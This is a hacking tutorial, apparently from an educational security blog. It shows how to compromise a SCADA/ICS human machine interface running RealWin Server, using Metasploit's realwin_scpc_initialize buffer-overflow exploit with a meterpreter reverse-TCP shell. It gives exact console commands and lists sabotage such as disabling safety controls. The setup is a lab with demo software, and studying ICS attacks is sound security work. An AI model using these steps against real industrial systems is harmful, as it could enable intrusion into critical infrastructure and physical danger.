Search
  • otw

SCADA Hacking: Attacking SCADA/ICS Systems through the Human Machine Interface (HMI)


Welcome back, my aspiring SCADA/ICS cyberwarriors!


Let's begin by congratulating you on your foresight in committing to study SCADA/ICS hacking and security. This is certainly THE most important security issue this decade!


In general, SCADA/ICS hacks have been of two types;


  1. Hack the protocols (modbus, DNP3, Profitnet, etc);

  2. Hack the Human Machine Interface (HMI)


In this tutorial, we will demonstrate a compromise of a HMI system using a buffer overflow in the monitoring software.


The Human Machine Interface


In most SCADA/ICS installations, there is a dedicated system for managing and monitoring the industrial system. Most people in the industry refer to this as the human machine interface or HMI. This system is crucial to the management the industrial system but also can be a critical vector for attackers. If the attacker can compromise the HMI, they own your industrial network!



In most installations, the HMI is outside the corporate network as depicted below. Unfortunately, in some cases the HMI is inside the corporate network making it vulnerable to an attacker who compromises the corporate network (see the BlackEnergy3 attack).



Best practice is to isolate the HMI from corporate network (see the Purdue Topology Model below).




These HMI's usually are Windows-based systems with special software installed to manage and monitor all the industrial systems similar to that seen below.


This SCADA/HMI software is just as prone to software vulnerabilities as any windows software.


In this tutorial we will be exploiting a vulnerable HMI system by exploiting a buffer overflow in the HMI software. Once we have control of the HMI system, we own the industrial network and then unknown malicious activities can take place including;


  1. Disabling sensors and alarms

  2. Increasing temperature and pressure

  3. Altering the mix and concentration of chemicals

  4. Altering the ladder logic

  5. Disabling safety controls


Any of these changes to the system could have deadly and severe economic consequences.



Step #1: RealWin Server


In this attack, we will be attacking an HMI system with RealWin Server. RealWin Server is a product of DATAC RealWin, an Irish software company acquired by Texas -based Lufkin Industries.


You can download the Demo RealWin Server from here.


Install it into a Windows XP system. Admittedly, this is relatively old exploit, but the SCADA/ICS industry is very slow to update and upgrade systems due to the nature of their business (in many cases, there is an opportunity to update just once per year). In any case, newbies to cybersecurity fail to recognize that industrial systems are often run on very old and outdated systems for a variety of reasons (see Shodan, Finding Outdated and Vulnerable Systems).


Once you download and install RealWin server, click on the Desktop icon and it opens an interface like that below.



Note that this HMI software is designed to operate in the Telecom, Electricity, Oil/Gas, Marine and Water industries. If we click on the Electricity module, it opens map of facilities in the Ne York City area (of course, it can be tailored to any region).



Ste #2: Open Metasploit


The next step is to open Metasploit in Kali. If you are not familiar with Metasploit, stop here and read my multi-part series on Metasploit here.


Metasploit has large number of SCADA/ICS modules. For a complete listing of all Metasploit SCADA modules, click here.


kali > msfconsole

Now, let's search for the realwin HMI modules.


msf5> search realwin



As you can see above, there are 6 modules with Realwin in their names. Let's try the realwin_scpc_initialize module. We can load it into memory by entering;


msf5> use exploit/windows/scada/realwin_scpc_initialize



To learn more about this module, enter "info"


msf5 > info


As you can see above, this module exploits on port 912 by default and send a "specially crafted packet" to execute arbitrary code on the system. The payload was automatically set to "windows/meterpreter/reverse_tcp". Let's leave the default payload as is.


Step #3: Prepare the Exploit for Execution


Now, let's look at the options. In the exploit, there are few options and even fewer we need to set. As you can see below, this exploit simply needs us to set the RHOSTS (remote hosts) and LHOST (local host) option.


msf5 > show options

Let's set those variables with the iP address of our HMI system (RHOSTS) and our Kali system (LHOST).

Now, we are ready to exploit that HMI and hopefully take control of the entire industrial facility!


msf5> exploit

Sucsess! As you can see above, we were able to get a meterpreter prompt on the HMI system. When we entered "sysinfo" it returned the system information of the HMI system.


Let's see what directory we are in on the HMI system by entering pwd.


meterpreter> pwd

As you can see, we entered the HMI through the monitoring software DATAC Realwin and presenting are in the C:\PROGR~1\DATAC\Real.Win directory. By entering "dir", we can see all the program files for this monitoring software.


Summary


SCADA/ICS security is the most important security issue of this decade but few are paying it much attention. In any type of geopolitical skirmish or conflict, antagonists will certainly target SCADA/ICS systems. In the past, these systems have been compromised in at least two ways, attacking the protocols or attacking the HMI. In this tutorial, we demonstrated the use of a buffer overflow to take control of the HMI and, thereby, take control of the entire industrial facility!